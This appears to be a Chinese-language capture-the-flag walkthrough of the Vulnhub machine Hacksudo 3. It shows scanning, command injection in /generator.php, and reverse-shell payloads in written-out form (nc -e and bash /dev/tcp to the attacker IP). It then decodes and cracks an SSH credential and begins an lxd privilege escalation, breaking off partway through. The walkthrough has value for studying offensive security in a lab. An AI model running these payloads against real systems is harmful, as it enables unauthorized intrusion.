Hacksudo 3
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:96:d2:34 1 60 PCS Systemtechnik GmbH
192.168.56.213 08:00:27:2c:a1:11 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.213
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.213 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 04:33 EST
Nmap scan report for localhost (192.168.56.213)
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Link Lock - Password-protect links
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:2C:A1:11 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.46 seconds
NMAP扫描结果表明目标主机有1个开放端口80,其他两个端口显示filtered.(21.22)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ curl http://192.168.56.213/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.46 (Ubuntu) Server at 192.168.56.213 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ nikto -h http://192.168.56.213
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.213
+ Target Hostname: 192.168.56.213
+ Target Port: 80
+ Start Time: 2022-11-23 04:38:02 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 8de, size: 5bddff0c01c87, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3092: /hidden/: This might be interesting...
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /login.php: Admin login page/section found.
+ 7916 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2022-11-23 04:38:51 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.46) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
识别出一个目录/hidden和/login.php文件,不过初看/hidden目录没啥用处。
/generator.php发现有命令执行漏洞,接下来设法获取反向shell,比如
jason&&nc -e /bin/bash 192.168.56.206 5555
但是没有建立,可能有某种过滤,试一下其他的方法
最后这种方法成功了!!!
bash -c "bash -i >& /dev/tcp/192.168.56.206/5555 0>&1"
在Kali Linux得到了目标主机反弹回来的shell.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.213] 55358
bash: cannot set terminal process group (744): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacksudo:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@hacksudo:/var/www/html$ which python
which python
www-data@hacksudo:/var/www/html$ which python3
which python3
/usr/bin/python3
www-data@hacksudo:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<tml$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacksudo:/var/www/html$
发现了这个比较奇怪的文件:
www-data@hacksudo:/var/www$ cat hacksudo
cat hacksudo
unpxfhqb ybpxre FFU hfreanzr:unpxfhqb cnffjbeq:63p9142792q571q0s7p28ro30626q6s38792n2r7679o76q784231676q62447so80ns8953745s709p6622qqn2po4q754p262q0q31o3030n08s7o524079n6o336o
www-data@hacksudo:/var/www$ ./hacksudo
./hacksudo
./hacksudo: line 1: unpxfhqb: command not found
www-data@hacksudo:/var/www$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 www-data www-data 4.0K Mar 20 2021 .
drwxr-xr-x 14 root root 4.0K Mar 19 2021 ..
-rwxrwxr-- 1 www-data www-data 176 Mar 20 2021 hacksudo
drwxr-xr-x 6 www-data www-data 4.0K Mar 24 2021 html
www-data@hacksudo:/var/www$ ./hacksudo
./hacksudo
./hacksudo: line 1: unpxfhqb: command not found
www-data@hacksudo:/var/www$ file hacksudo
file hacksudo
hacksudo: ASCII text
www-data@hacksudo:/var/www$
似乎是一种加密,可能是凯撒加密, ROT13
hacksudo locker SSH username:hacksudo password:63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b
密码是加密过的
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b
Possible Hashs:
[+] SHA-512
[+] Whirlpool
用在线网站加密:
https://10015.io/tools/sha512-encrypt-decrypt
解密以后得到的密码是:vishal
hacksudo@hacksudo:~$ id
id
uid=1000(hacksudo) gid=1000(hacksudo) groups=1000(hacksudo),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
hacksudo@hacksudo:~$ ls
ls
chat locker storage user.txt view work
hacksudo@hacksudo:~$ cat user.txt
cat user.txt
d045e6f9feb79e94442213f9d008ac48
hacksudo@hacksudo:~$
提权
由于hacksudo是lxd组成员,接下来用lxd进行提权
通过git将构建好的alpine镜像克隆至本地
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 3.21 MiB/s, done.
Resolving deltas: 100% (15/15), done.
hacksudo@hacksudo:~$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
<6.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-11-23 10:53:05-- http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’
alpine-v3.13-x86_64 100%[===================>] 3.11M --.-KB/s in 0.01s
2022-11-23 10:53:05 (308 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]
hacksudo@hacksudo:~$ ls
ls
alpine-v3.13-x86_64-20210218_0139.tar.gz locker storage view
chat snap user.txt work
hacksudo@hacksudo:~$